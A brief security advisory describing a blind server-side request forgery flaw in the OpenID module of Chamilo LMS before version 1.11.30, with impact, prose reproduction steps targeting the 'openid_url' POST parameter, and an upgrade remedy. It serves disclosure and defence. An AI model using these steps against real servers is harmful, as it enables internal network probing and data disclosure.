Chamilo LMS Blind Server-Side Request Forgery Vulnerability

A blind server-side request forgery (SSRF) vulnerability has been identified in Chamilo LMS versions prior to 1.11.30. The issue resides in the OpenID module, specifically within the '/index.php' file, where the 'POST openid_url' parameter is insufficiently validated. This vulnerability allows attackers to send requests to external servers or internal resources with restricted access, potentially leading to the disclosure of sensitive information, denial-of-service conditions, and more. Exploitation can also involve scanning internal networks or accessing local resources.

Impact

Exploitation of this vulnerability allows for blind server-side request forgery, where an attacker can send requests from the server to external or internal resources, potentially leading to the disclosure of sensitive information or causing a denial-of-service.

Reproduction

To reproduce this vulnerability, send a POST request to '/index.php' with the 'openid_url' parameter. The value of this parameter can be set to an external address or an internal resource that the server can access. The request should be made with a 'User-Agent' that mimics a Chamilo client.

Remediation

Users can update to Chamilo LMS version 1.11.30 or later, where this vulnerability has been patched.